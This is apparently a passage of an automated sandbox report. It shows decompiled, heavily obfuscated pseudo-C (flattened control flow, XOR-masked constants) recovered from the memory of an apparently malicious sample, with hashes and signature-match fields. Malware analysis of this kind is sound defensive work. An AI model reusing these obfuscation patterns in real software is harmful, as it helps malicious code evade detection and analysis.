                                          				signed int _v1692;
                                          				signed int _v1696;
                                          				signed int _v1700;
                                          				signed int _v1704;
                                          				signed int _v1708;
                                          				signed int _v1712;
                                          				signed int _v1716;
                                          				signed int _v1720;
                                          				signed int _v1724;
                                          				signed int _v1728;
                                          				signed int _v1732;
                                          				signed int _v1736;
                                          				signed int _v1740;
                                          				signed int _v1744;
                                          				signed int _v1748;
                                          				signed int _v1752;
                                          				signed int _v1756;
                                          				signed int _v1760;
                                          				signed int _v1764;
                                          				signed int _v1768;
                                          				signed int _v1772;
                                          				signed int _v1776;
                                          				signed int _v1780;
                                          				signed int _v1784;
                                          				signed int _v1788;
                                          				signed int _v1792;
                                          				signed int _v1796;
                                          				signed int _v1800;
                                          				void* _t474;
                                          				void* _t475;
                                          				signed int _t479;
                                          				signed int _t491;
                                          				signed int _t496;
                                          				signed int _t500;
                                          				signed int _t510;
                                          				signed int _t511;
                                          				signed int _t512;
                                          				signed int _t513;
                                          				signed int _t514;
                                          				signed int _t515;
                                          				void* _t520;
                                          				signed int _t524;
                                          				void* _t530;
                                          				void* _t532;
                                          				signed int _t572;
                                          				signed int _t573;
                                          				signed int _t574;
                                          				signed int _t575;
                                          				void* _t579;
                                          				void* _t580;
                                          				void* _t582;
                                          
                                          				_v1628 = 0xed3;
                                          				_v1628 = _v1628 + 0xd002;
                                          				_v1628 = _v1628 ^ 0x0000defc;
                                          				_v1796 = 0x50e8;
                                          				_v1796 = _v1796 + 0xffffea13;
                                          				_v1796 = _v1796 >> 0xe;
                                          				_v1796 = _v1796 ^ 0x3dc2eaa9;
                                          				_v1796 = _v1796 ^ 0x3dc2b05a;
                                          				_v1604 = 0xecd0;
                                          				_v1604 = _v1604 << 0xd;
                                          				_v1604 = _v1604 ^ 0x1d9a54ec;
                                          				_v1636 = 0xad8d;
                                          				_v1636 = _v1636 >> 0xc;
                                          				_v1636 = _v1636 ^ 0x000019e2;
                                          				_v1600 = 0x1846;
                                          				_v1592 = __edx;
                                          				_t574 = 0x4762904;
                                          				_v1588 = __ecx;
                                          				_t510 = 0x63;
                                          				_v1600 = _v1600 / _t510;
                                          				_v1600 = _v1600 ^ 0x00006484;
                                          				_v1740 = 0xfd34;
                                          				_v1740 = _v1740 ^ 0x1b9865fd;
                                          				_v1740 = _v1740 ^ 0xced01448;
                                          				_v1740 = _v1740 ^ 0xd548e885;
                                          				_v1684 = 0x582a;
                                          				_t572 = 0x3b;
                                          				_v1684 = _v1684 / _t572;
                                          				_v1684 = _v1684 ^ 0x000016a0;
                                          				_v1724 = 0x2b60;
                                          				_t511 = 0x34;
                                          				_v1724 = _v1724 / _t511;
                                          				_v1724 = _v1724 ^ 0xf4396e09;
                                          				_v1724 = _v1724 ^ 0xf4397db5;
                                          				_v1732 = 0x220f;
                                          				_v1732 = _v1732 ^ 0x234d952a;
                                          				_v1732 = _v1732 >> 1;
                                          				_v1732 = _v1732 ^ 0x11a6b27c;
                                          				_v1616 = 0x4d57;
                                          				_v1616 = _v1616 << 0xb;
                                          				_v1616 = _v1616 ^ 0x026acda8;
                                          				_v1672 = 0x3d68;
                                          				_v1672 = _v1672 + 0xffff611f;
                                          				_v1672 = _v1672 ^ 0xffff811c;
                                          				_v1800 = 0xf339;
                                          				_v1800 = _v1800 + 0xfffff0f7;
                                          				_v1800 = _v1800 + 0x895c;
                                          				_v1800 = _v1800 + 0xc572;
                                          				_v1800 = _v1800 ^ 0x000271c2;
                                          				_v1664 = 0x37c5;
                                          				_v1664 = _v1664 + 0xffffa7ba;
                                          				_v1664 = _v1664 ^ 0xffffa1b5;
                                          				_v1632 = 0xc51c;
                                          				_v1632 = _v1632 >> 4;
                                          				_v1632 = _v1632 ^ 0x00001093;
                                          				_v1640 = 0x76f9;
                                          				_v1640 = _v1640 ^ 0x9fffdcc0;
                                          				_v1640 = _v1640 ^ 0x9fff82e4;
                                          				_v1648 = 0x8076;
                                          				_v1648 = _v1648 * 7;
                                          				_v1648 = _v1648 ^ 0x0003a5e4;
                                          				_v1708 = 0x21bc;
                                          				_v1708 = _v1708 + 0xc05f;
                                          				_v1708 = _v1708 << 6;
                                          				_v1708 = _v1708 ^ 0x0038a40f;
                                          				_v1784 = 0xa89a;
                                          				_v1784 = _v1784 / _t572;
                                          				_v1784 = _v1784 + 0xffffeb30;
                                          				_v1784 = _v1784 << 0xa;
                                          				_v1784 = _v1784 ^ 0xffb86208;
                                          				_v1656 = 0x5b43;
                                          				_v1656 = _v1656 ^ 0xe62d1ba2;
                                          				_v1656 = _v1656 ^ 0xe62d5436;
                                          				_v1792 = 0x5d3e;
                                          				_v1792 = _v1792 >> 5;
                                          				_v1792 = _v1792 + 0xfffff433;
                                          				_v1792 = _v1792 ^ 0x1afa5a2f;
                                          				_v1792 = _v1792 ^ 0xe50594ef;
                                          				_v1680 = 0x9f3f;
                                          				_v1680 = _v1680 + 0xfffff3b1;
                                          				_v1680 = _v1680 ^ 0x0000dcc5;
                                          				_v1780 = 0x8a4e;
                                          				_v1780 = _v1780 >> 0xc;
                                          				_v1780 = _v1780 + 0x10e4;
                                          				_v1780 = _v1780 ^ 0x817594c9;
                                          				_v1780 = _v1780 ^ 0x81758ecd;
                                          				_v1748 = 0xbeb1;
                                          				_v1748 = _v1748 | 0x408b0c07;
                                          				_v1748 = _v1748 + 0xffff7379;
                                          				_v1748 = _v1748 ^ 0x408b5cad;
                                          				_v1752 = 0xb76f;
                                          				_v1752 = _v1752 >> 0xe;
                                          				_t512 = 0x23;
                                          				_v1752 = _v1752 / _t512;
                                          				_v1752 = _v1752 ^ 0x000011f4;
                                          				_v1652 = 0x783b;
                                          				_v1652 = _v1652 ^ 0xf6ea495a;
                                          				_v1652 = _v1652 ^ 0xf6ea4537;
                                          				_v1788 = 0x701e;
                                          				_v1788 = _v1788 | 0x54ae9efd;
                                          				_v1788 = _v1788 >> 0xa;
                                          				_v1788 = _v1788 + 0x818c;
                                          				_v1788 = _v1788 ^ 0x0015b45a;
                                          				_v1756 = 0xfc95;
                                          				_t513 = 0x4e;
                                          				_v1756 = _v1756 / _t513;
                                          				_v1756 = _v1756 | 0x6e3e6587;
                                          				_v1756 = _v1756 ^ 0x6e3e48c8;
                                          				_v1720 = 0xc52f;
                                          				_v1720 = _v1720 >> 5;
                                          				_v1720 = _v1720 << 2;
                                          				_v1720 = _v1720 ^ 0x00007c98;
                                          				_v1620 = 0xf570;
                                          				_v1620 = _v1620 >> 0xa;
                                          				_v1620 = _v1620 ^ 0x00006ca8;
                                          				_v1712 = 0x65f6;
                                          				_v1712 = _v1712 | 0x8fa1cc9c;
                                          				_v1712 = _v1712 >> 9;
                                          				_v1712 = _v1712 ^ 0x0047fc5c;
                                          				_v1676 = 0xb942;
                                          				_v1676 = _v1676 * 0x15;
                                          				_v1676 = _v1676 ^ 0x000f4c8d;
                                          				_v1736 = 0x950a;
                                          				_v1736 = _v1736 | 0x9f71954d;
                                          				_v1736 = _v1736 + 0xffff5dd1;
                                          				_v1736 = _v1736 ^ 0x9f70c3f6;
                                          				_v1704 = 0xd0f3;
                                          				_v1704 = _v1704 + 0xffff53c3;
                                          				_v1704 = _v1704 ^ 0xce9fbdc0;
                                          				_v1704 = _v1704 ^ 0xce9f87f0;
                                          				_v1596 = 0x1518;
                                          				_v1596 = _v1596 + 0x85a2;
                                          				_v1596 = _v1596 ^ 0x000083d8;
                                          				_v1668 = 0x64f;
                                          				_v1668 = _v1668 + 0xffff0b06;
                                          				_v1668 = _v1668 ^ 0xffff3669;
                                          				_v1728 = 0x3b1d;
                                          				_v1728 = _v1728 + 0x874c;
                                          				_v1728 = _v1728 | 0x620470b3;
                                          				_v1728 = _v1728 ^ 0x6204e551;
                                          				_v1696 = 0x2df9;
                                          				_v1696 = _v1696 << 0xf;
                                          				_v1696 = _v1696 >> 4;
                                          				_v1696 = _v1696 ^ 0x016fb4ca;
                                          				_v1764 = 0xcc6;
                                          				_v1764 = _v1764 | 0x8d34f989;
                                          				_t514 = 0x74;
                                          				_v1764 = _v1764 / _t514;
                                          				_t515 = 0x18;
                                          				_v1764 = _v1764 * 0x6c;
                                          				_v1764 = _v1764 ^ 0x8377a340;
                                          				_v1608 = 0x20b8;
                                          				_v1608 = _v1608 + 0xffffe23d;
                                          				_v1608 = _v1608 ^ 0x000040ba;
                                          				_v1660 = 0xbd08;
                                          				_v1660 = _v1660 | 0x92c929d6;
                                          				_v1660 = _v1660 ^ 0x92c9e2c3;
                                          				_v1644 = 0x1738;
                                          				_v1644 = _v1644 + 0x2a2d;
                                          				_v1644 = _v1644 ^ 0x00007d9b;
                                          				_v1772 = 0x814c;
                                          				_v1772 = _v1772 * 0x2f;
                                          				_v1772 = _v1772 ^ 0x2fd35c8b;
                                          				_v1772 = _v1772 << 9;
                                          				_v1772 = _v1772 ^ 0x89c0ce59;
                                          				_v1612 = 0xaccd;
                                          				_v1612 = _v1612 << 0xb;
                                          				_v1612 = _v1612 ^ 0x05662888;
                                          				_v1624 = 0x6919;
                                          				_v1624 = _v1624 >> 0xb;
                                          				_v1624 = _v1624 ^ 0x00005c9e;
                                          				_v1768 = 0x2455;
                                          				_v1768 = _v1768 ^ 0xee213c0c;
                                          				_v1768 = _v1768 + 0xffffdbe3;
                                          				_v1768 = _v1768 >> 6;
                                          				_v1768 = _v1768 ^ 0x03b8b908;
                                          				_v1776 = 0x634b;
                                          				_v1776 = _v1776 << 3;
                                          				_v1776 = _v1776 * 0x44;
                                          				_v1776 = _v1776 + 0xffff5e24;
                                          				_v1776 = _v1776 ^ 0x00d21830;
                                          				_v1688 = 0xdff8;
                                          				_v1688 = _v1688 ^ 0x1c92e1a2;
                                          				_v1688 = _v1688 ^ 0x1c9257de;
                                          				_v1744 = 0xd5b6;
                                          				_v1744 = _v1744 << 7;
                                          				_v1744 = _v1744 ^ 0x97cdeac8;
                                          				_v1744 = _v1744 ^ 0x97a72039;
                                          				_v1692 = 0x89ed;
                                          				_v1692 = _v1692 + 0xffff6a89;
                                          				_v1692 = _v1692 | 0xb25fce0e;
                                          				_v1692 = _v1692 ^ 0xfffff10e;
                                          				_v1700 = 0xa1e5;
                                          				_v1700 = _v1700 * 0x2a;
                                          				_v1700 = _v1700 + 0xffff21dd;
                                          				_v1700 = _v1700 ^ 0x00199ee5;
                                          				_v1760 = 0x2165;
                                          				_v1760 = _v1760 + 0xb9ba;
                                          				_v1760 = _v1760 / _t515;
                                          				_v1760 = _v1760 * 0x41;
                                          				_v1760 = _v1760 ^ 0x000227fb;
                                          				_v1716 = 0x5b5d;
                                          				_v1716 = _v1716 | 0x7b7605fc;
                                          				_v1716 = _v1716 >> 5;
                                          				_v1716 = _v1716 ^ 0x03cbb2ff;
                                          				_t474 = E006D6D44(_t515);
                                          				_t573 = _v1592;
                                          				_t579 = _t474;
                                          				_t508 = _v1592;
                                          				while(1) {
                                          					L1:
                                          					_t475 = 0x1359b45f;
                                          					do {
                                          						while(1) {
                                          							L2:
                                          							_t582 = _t574 - 0x1dbe7493;
                                          							if(_t582 > 0) {
                                          								break;
                                          							}
                                          							if(_t582 == 0) {
                                          								return E006CF536(_v1692, _v1700, _v1760, _t573);
                                          							}
                                          							if(_t574 != 0x4762904) {
                                          								if(_t574 == 0x589c6e4) {
                                          									E006CF536(_v1644, _v1772, _v1612, _t508);
                                          									_pop(_t524);
                                          									_t574 = 0x1e3f4be6;
                                          									while(1) {
                                          										L1:
                                          										_t475 = 0x1359b45f;
                                          										goto L2;
                                          									}
                                          								} else {
                                          									if(_t574 == 0xb2e7f16) {
                                          										_t524 = _v1748;
                                          										_t500 = E006D1773(_v1752, _v1584, _v1580, _v1652, _v1788);
                                          										_t508 = _t500;
                                          										_t580 = _t580 + 0x10;
                                          										__eflags = _t500;
                                          										_t475 = 0x1359b45f;
                                          										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
                                          										continue;
                                          									} else {
                                          										if(_t574 == 0xbe4541e) {
                                          											_push(_t524);
                                          											_push(_v1660);
                                          											_push(0);
                                          											_push(_v1608);
                                          											_push(0);
                                          											_push(_v1764);
                                          											_t524 = _v1696;
                                          											_push( &_v1564);
                                          											E006C568E(_t524, 1);
                                          											_t580 = _t580 + 0x1c;
                                          											_t574 = 0x589c6e4;
                                          											while(1) {
                                          												L1:
                                          												_t475 = 0x1359b45f;
                                          												goto L2;
                                          											}
                                          										} else {
                                          											if(_t574 == _t475) {
                                          												_push(_v1720);
                                          												E006C29E3( &_v524, 0x104, E006D889D(0x6dc8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
                                          												_t580 = _t580 + 0x24;
                                          												E006D2025(_v1596, _t503, _v1668, _v1728);
                                          												_pop(_t524);
                                          												_t574 = 0xbe4541e;
                                          												while(1) {
                                          													L1:
                                          													_t475 = 0x1359b45f;
                                          													goto L2;
                                          												}
                                          											} else {
                                          												if(_t574 != 0x1d7e83db) {
                                          													goto L29;
                                          												} else {
                                          													E006D4F7D(_v1688, _v1744, _v1576);
                                          													_pop(_t524);
                                          													_t574 = 0x3025b1cf;
                                          													while(1) {
                                          														L1:
                                          														_t475 = 0x1359b45f;
                                          														goto L2;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L23:
                                          								return _t496;
                                          							}
                                          							_push(_t524);
                                          							_t530 = 0x38;
                                          							_t496 = E006C8736(_t530);
                                          							_t573 = _t496;
                                          							_t532 = _t524;
                                          							__eflags = _t573;
                                          							if(_t573 != 0) {
                                          								_push(_t532);
                                          								_push(_t532);
                                          								_t524 = _v1684;
                                          								E006CC6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
                                          								_t580 = _t580 + 0x1c;
                                          								_t574 = 0x2d0f1252;
                                          								while(1) {
                                          									L1:
                                          									_t475 = 0x1359b45f;
                                          									goto L2;
                                          								}
                                          							}
                                          							goto L23;
                                          						}
                                          						__eflags = _t574 - 0x1e3f4be6;
                                          						if(_t574 == 0x1e3f4be6) {
                                          							E006CF536(_v1624, _v1768, _v1776, _v1584);
                                          							_t574 = 0x1d7e83db;
                                          							_t475 = 0x1359b45f;
                                          							goto L29;
                                          						} else {
                                          							__eflags = _t574 - 0x20ae1a02;
                                          							if(_t574 == 0x20ae1a02) {
                                          								_v1572 = E006D388A();
                                          								_t479 = E006D0ADC(_t478, _v1800, _v1664);
                                          								_pop(_t520);
                                          								_v1568 = 2 + _t479 * 2;
                                          								E006CB35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
                                          								_t580 = _t580 + 0x30;
                                          								asm("sbb esi, esi");
                                          								_t575 = _t574 & 0x097497a8;
                                          								goto L25;
                                          							} else {
                                          								__eflags = _t574 - 0x27330c3b;
                                          								if(_t574 == 0x27330c3b) {
                                          									E006C80BA( &_v1576, _v1680, _v1780,  &_v1584);
                                          									asm("sbb esi, esi");
                                          									_pop(_t524);
                                          									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
                                          									goto L1;
                                          								} else {
                                          									__eflags = _t574 - 0x2d0f1252;
                                          									if(_t574 == 0x2d0f1252) {
                                          										_push( &_v524);
                                          										E006C88E5(_v1588, _v1592);
                                          										asm("sbb esi, esi");
                                          										_t524 = 0x6dc8f0;
                                          										_t575 = _t574 & 0x02efa56f;
                                          										__eflags = _t575;
                                          										L25:
                                          										_t574 = _t575 + 0x1dbe7493;
                                          										while(1) {
                                          											L1:
                                          											_t475 = 0x1359b45f;
                                          											goto L2;
                                          										}
                                          									} else {
                                          										__eflags = _t574 - 0x3025b1cf;
                                          										if(_t574 == 0x3025b1cf) {
                                          											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
                                          											_t491 =  *0x6dca24; // 0x0
                                          											 *(_t573 + 0x2c) = _t491;
                                          											 *0x6dca24 = _t573;
                                          											return _t491;
                                          										}
                                          										goto L29;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						goto L23;
                                          						L29:
                                          						__eflags = _t574 - 0x15e8ba90;
                                          					} while (__eflags != 0);
                                          					return _t475;
                                          				}
                                          			}
                                          0x006c5003
                                          0x006c500e
                                          0x006c5019
                                          0x006c5021
                                          0x006c502c
                                          0x006c5034
                                          0x006c503c
                                          0x006c5044
                                          0x006c5049
                                          0x006c5051
                                          0x006c5059
                                          0x006c5063
                                          0x006c5067
                                          0x006c506f
                                          0x006c5077
                                          0x006c5082
                                          0x006c508d
                                          0x006c5098
                                          0x006c50a0
                                          0x006c50a5
                                          0x006c50ad
                                          0x006c50b5
                                          0x006c50c0
                                          0x006c50cb
                                          0x006c50d6
                                          0x006c50e1
                                          0x006c50ee
                                          0x006c50f2
                                          0x006c50fa
                                          0x006c5102
                                          0x006c510a
                                          0x006c5118
                                          0x006c5121
                                          0x006c5125
                                          0x006c512d
                                          0x006c5135
                                          0x006c513d
                                          0x006c5142
                                          0x006c5155
                                          0x006c515a
                                          0x006c5161
                                          0x006c5163
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x006c516f
                                          0x006c516f
                                          0x006c516f
                                          0x006c516f
                                          0x006c5175
                                          0x00000000
                                          0x00000000
                                          0x006c517b
                                          0x00000000
                                          0x006c54f8
                                          0x006c5187
                                          0x006c5193
                                          0x006c52e9
                                          0x006c52ef
                                          0x006c52f0
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c5199
                                          0x006c519f
                                          0x006c52ad
                                          0x006c52b8
                                          0x006c52bd
                                          0x006c52bf
                                          0x006c52c2
                                          0x006c52c9
                                          0x006c52ce
                                          0x00000000
                                          0x006c51a5
                                          0x006c51ab
                                          0x006c525c
                                          0x006c525d
                                          0x006c526d
                                          0x006c526f
                                          0x006c5277
                                          0x006c5279
                                          0x006c527d
                                          0x006c5284
                                          0x006c5285
                                          0x006c528a
                                          0x006c528d
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c51b1
                                          0x006c51b3
                                          0x006c51e0
                                          0x006c522f
                                          0x006c5234
                                          0x006c524b
                                          0x006c5251
                                          0x006c5252
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c51b5
                                          0x006c51bb
                                          0x00000000
                                          0x006c51c1
                                          0x006c51d3
                                          0x006c51d8
                                          0x006c51d9
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c516a
                                          0x006c51bb
                                          0x006c51b3
                                          0x006c51ab
                                          0x006c519f
                                          0x006c53b2
                                          0x006c53b2
                                          0x006c53b2
                                          0x006c530c
                                          0x006c5310
                                          0x006c5311
                                          0x006c5316
                                          0x006c5319
                                          0x006c531a
                                          0x006c531c
                                          0x006c5322
                                          0x006c5323
                                          0x006c5342
                                          0x006c534a
                                          0x006c534f
                                          0x006c5352
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c531c
                                          0x006c535c
                                          0x006c5362
                                          0x006c54bd
                                          0x006c54c4
                                          0x006c54c9
                                          0x00000000
                                          0x006c5368
                                          0x006c5368
                                          0x006c536e
                                          0x006c5439
                                          0x006c5440
                                          0x006c5445
                                          0x006c545c
                                          0x006c5490
                                          0x006c5495
                                          0x006c549a
                                          0x006c549c
                                          0x00000000
                                          0x006c5374
                                          0x006c5374
                                          0x006c537a
                                          0x006c5404
                                          0x006c540c
                                          0x006c5414
                                          0x006c5415
                                          0x00000000
                                          0x006c537c
                                          0x006c537c
                                          0x006c5382
                                          0x006c53c8
                                          0x006c53ce
                                          0x006c53d6
                                          0x006c53d8
                                          0x006c53d9
                                          0x006c53d9
                                          0x006c53df
                                          0x006c53df
                                          0x006c516a
                                          0x006c516a
                                          0x006c516a
                                          0x00000000
                                          0x006c516a
                                          0x006c5384
                                          0x006c5384
                                          0x006c538a
                                          0x006c5397
                                          0x006c539a
                                          0x006c539f
                                          0x006c53a2
                                          0x00000000
                                          0x006c53a2
                                          0x00000000
                                          0x006c538a
                                          0x006c5382
                                          0x006c537a
                                          0x006c536e
                                          0x00000000
                                          0x006c54ce
                                          0x006c54ce
                                          0x006c54ce
                                          0x00000000
                                          0x006c516f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: *X$-*$6T-$;x$>]$Kc$U$$WM$][$`+$e!$h=$P
                                          • API String ID: 0-2931794159
                                          • Opcode ID: 3fbddae332b31417b40c7e7430686ac53371363d2028fc0735c606c770b88e2a
                                          • Instruction ID: d952030c76407b6f1ad76f2b813a7e4f38f524a558f531980b172eca878fe128
                                          • Opcode Fuzzy Hash: 3fbddae332b31417b40c7e7430686ac53371363d2028fc0735c606c770b88e2a
                                          • Instruction Fuzzy Hash: 3F3215715087808FE378CF21C94AB9BBBE2FB84314F10891DE5DA962A0D7B59849CF03
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E006C8F78(intOrPtr __ecx, intOrPtr __edx) {
                                          				char _v524;
                                          				intOrPtr _v536;
                                          				char _v540;
                                          				intOrPtr _v544;
                                          				signed int _v548;
                                          				signed int _v552;
                                          				signed int _v556;
                                          				signed int _v560;
                                          				signed int _v564;
                                          				signed int _v568;
                                          				signed int _v572;
                                          				signed int _v576;
                                          				signed int _v580;
                                          				signed int _v584;
                                          				signed int _v588;
                                          				signed int _v592;
                                          				signed int _v596;
                                          				signed int _v600;
                                          				signed int _v604;
                                          				signed int _v608;
                                          				signed int _v612;
                                          				signed int _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				signed int _v636;
                                          				unsigned int _v640;
                                          				signed int _v644;
                                          				signed int _v648;
                                          				signed int _v652;
                                          				signed int _v656;
                                          				signed int _v660;
                                          				signed int _v664;
                                          				signed int _v668;
                                          				signed int _v672;
                                          				signed int _v676;
                                          				signed int _v680;
                                          				signed int _v684;
                                          				void* _t354;
                                          				intOrPtr _t355;
                                          				intOrPtr _t359;
                                          				void* _t362;
                                          				void* _t367;
                                          				void* _t378;
                                          				intOrPtr _t383;
                                          				signed int _t386;
                                          				signed int _t387;
                                          				signed int _t388;
                                          				signed int _t389;
                                          				signed int _t390;
                                          				signed int _t391;
                                          				signed int _t392;
                                          				signed int _t393;
                                          				void* _t394;
                                          				void* _t395;
                                          				signed int _t401;
                                          				signed int _t435;
                                          				intOrPtr _t444;
                                          				signed int _t445;
                                          				intOrPtr _t449;
                                          				signed int* _t450;
                                          				void* _t452;
                                          
                                          				_t450 =  &_v684;
                                          				_v548 = _v548 & 0x00000000;
                                          				_v652 = 0x628b;
                                          				_v652 = _v652 | 0x8ea8a6c3;
                                          				_v652 = _v652 >> 8;
                                          				_v652 = _v652 ^ 0x078a89dd;
                                          				_v652 = _v652 ^ 0x0504213b;
                                          				_v656 = 0xca44;
                                          				_v656 = _v656 << 3;
                                          				_v656 = _v656 >> 0xa;
                                          				_v656 = _v656 | 0x073c6a17;
                                          				_v656 = _v656 ^ 0x073c621f;
                                          				_v664 = 0x16e0;
                                          				_v664 = _v664 + 0xffffe980;
                                          				_v664 = _v664 >> 8;
                                          				_v544 = __edx;
                                          				_t449 = __ecx;
                                          				_t445 = 0x351028fa;
                                          				_t386 = 0x6c;
                                          				_v664 = _v664 / _t386;
                                          				_v664 = _v664 ^ 0x00007066;
                                          				_v640 = 0x836e;
                                          				_v640 = _v640 + 0xb501;
                                          				_v640 = _v640 >> 2;
                                          				_v640 = _v640 ^ 0x000012b9;
                                          				_v628 = 0xb2ec;
                                          				_t387 = 0x41;
                                          				_v628 = _v628 * 0x46;
                                          				_v628 = _v628 + 0xd97;
                                          				_v628 = _v628 ^ 0x0030acaf;
                                          				_v576 = 0x565d;
                                          				_v576 = _v576 | 0xc8c85e8e;
                                          				_v576 = _v576 ^ 0xc8c86b89;
                                          				_v560 = 0xfa05;
                                          				_v560 = _v560 + 0x1743;
                                          				_v560 = _v560 ^ 0x00015cb0;
                                          				_v588 = 0x54a3;
                                          				_v588 = _v588 ^ 0x711a4c60;
                                          				_v588 = _v588 << 6;
                                          				_v588 = _v588 ^ 0x46864cc2;
                                          				_v596 = 0xba14;
                                          				_v596 = _v596 + 0xf2e8;
                                          				_v596 = _v596 + 0x1be7;
                                          				_v596 = _v596 ^ 0x00019f0a;
                                          				_v660 = 0x9a1f;
                                          				_v660 = _v660 / _t387;
                                          				_t388 = 0x56;
                                          				_v660 = _v660 * 0x79;
                                          				_v660 = _v660 << 0xd;
                                          				_v660 = _v660 ^ 0x23dca07a;
                                          				_v676 = 0x17dc;
                                          				_v676 = _v676 << 0xe;
                                          				_v676 = _v676 / _t388;
                                          				_v676 = _v676 + 0xffffccb5;
                                          				_v676 = _v676 ^ 0x0011ad2d;
                                          				_v636 = 0xbd70;
                                          				_v636 = _v636 | 0x80fc5ede;
                                          				_v636 = _v636 << 4;
                                          				_v636 = _v636 ^ 0x0fcfa70d;
                                          				_v608 = 0xbaf8;
                                          				_v608 = _v608 + 0xffff1119;
                                          				_t389 = 0x27;
                                          				_v608 = _v608 / _t389;
                                          				_v608 = _v608 ^ 0x06904b29;
                                          				_v684 = 0xf49f;
                                          				_t390 = 0x66;
                                          				_v684 = _v684 * 0x1f;
                                          				_v684 = _v684 + 0xffffe502;
                                          				_v684 = _v684 / _t390;
                                          				_v684 = _v684 ^ 0x00005c32;
                                          				_v668 = 0xe410;
                                          				_v668 = _v668 >> 0xc;
                                          				_v668 = _v668 + 0xffffc634;
                                          				_v668 = _v668 << 0xf;
                                          				_v668 = _v668 ^ 0xe3216c4d;
                                          				_v620 = 0x7d49;
                                          				_t391 = 0x24;
                                          				_v620 = _v620 * 0x1a;
                                          				_v620 = _v620 ^ 0x980c0cc6;
                                          				_v620 = _v620 ^ 0x9800e7e7;
                                          				_v564 = 0x5c7e;
                                          				_v564 = _v564 ^ 0x14aa654c;
                                          				_v564 = _v564 ^ 0x14aa562a;
                                          				_v552 = 0x450c;
                                          				_v552 = _v552 << 7;
                                          				_v552 = _v552 ^ 0x0022b9f7;
                                          				_v580 = 0x3573;
                                          				_v580 = _v580 >> 0xe;
                                          				_v580 = _v580 / _t391;
                                          				_v580 = _v580 ^ 0x000007cd;
                                          				_v584 = 0x18cc;
                                          				_v584 = _v584 >> 0xe;
                                          				_v584 = _v584 << 3;
                                          				_v584 = _v584 ^ 0x000042dd;
                                          				_v556 = 0x1e9b;
                                          				_v556 = _v556 + 0xffff5daa;
                                          				_v556 = _v556 ^ 0xffff6e35;
                                          				_v568 = 0x1617;
                                          				_v568 = _v568 << 4;
                                          				_v568 = _v568 ^ 0x000112eb;
                                          				_v572 = 0xca92;
                                          				_v572 = _v572 + 0x7b62;
                                          				_v572 = _v572 ^ 0x00017fbb;
                                          				_v592 = 0xd72f;
                                          				_v592 = _v592 | 0xe23ccaf6;
                                          				_v592 = _v592 + 0x7d96;
                                          				_v592 = _v592 ^ 0xe23d11e5;
                                          				_v644 = 0x4340;
                                          				_t392 = 7;
                                          				_v644 = _v644 * 0x73;
                                          				_v644 = _v644 | 0x11b8a473;
                                          				_v644 = _v644 ^ 0x11bec66f;
                                          				_v672 = 0x4860;
                                          				_v672 = _v672 / _t392;
                                          				_v672 = _v672 | 0x7c31fb12;
                                          				_v672 = _v672 ^ 0x5cc3fc4f;
                                          				_v672 = _v672 ^ 0x20f228b2;
                                          				_v680 = 0x617d;
                                          				_v680 = _v680 >> 0xd;
                                          				_v680 = _v680 | 0xd7e9f895;
                                          				_v680 = _v680 ^ 0xd7e9e095;
                                          				_v616 = 0xec2d;
                                          				_v616 = _v616 + 0xebc9;
                                          				_v616 = _v616 ^ 0x6282d746;
                                          				_v616 = _v616 ^ 0x6283789e;
                                          				_v600 = 0x3147;
                                          				_v600 = _v600 >> 0xe;
                                          				_t393 = 0x4c;
                                          				_t383 = _v544;
                                          				_t444 = _v544;
                                          				_v600 = _v600 * 0x6d;
                                          				_v600 = _v600 ^ 0x000035af;
                                          				_v604 = 0xdf1e;
                                          				_v604 = _v604 >> 0xa;
                                          				_v604 = _v604 + 0xffffe311;
                                          				_v604 = _v604 ^ 0xffffd288;
                                          				_v612 = 0xd6ea;
                                          				_v612 = _v612 << 0xc;
                                          				_v612 = _v612 * 0x1c;
                                          				_v612 = _v612 ^ 0x7819f753;
                                          				_v624 = 0x23;
                                          				_v624 = _v624 >> 6;
                                          				_v624 = _v624 ^ 0x0e47f934;
                                          				_v624 = _v624 ^ 0x0e47f086;
                                          				_v632 = 0x3384;
                                          				_v632 = _v632 >> 9;
                                          				_v632 = _v632 / _t393;
                                          				_v632 = _v632 ^ 0x000059c8;
                                          				_v648 = 0x4bab;
                                          				_v648 = _v648 * 0x33;
                                          				_v648 = _v648 ^ 0xea23b576;
                                          				_v648 = _v648 | 0x057acb41;
                                          				_v648 = _v648 ^ 0xef7effc2;
                                          				while(1) {
                                          					L1:
                                          					_t354 = 0x2d3a08fe;
                                          					while(1) {
                                          						L2:
                                          						_t394 = 0x2432fb60;
                                          						do {
                                          							while(1) {
                                          								L3:
                                          								_t452 = _t445 - _t394;
                                          								if(_t452 > 0) {
                                          									break;
                                          								}
                                          								if(_t452 == 0) {
                                          									_push( &_v524);
                                          									_push(_t394);
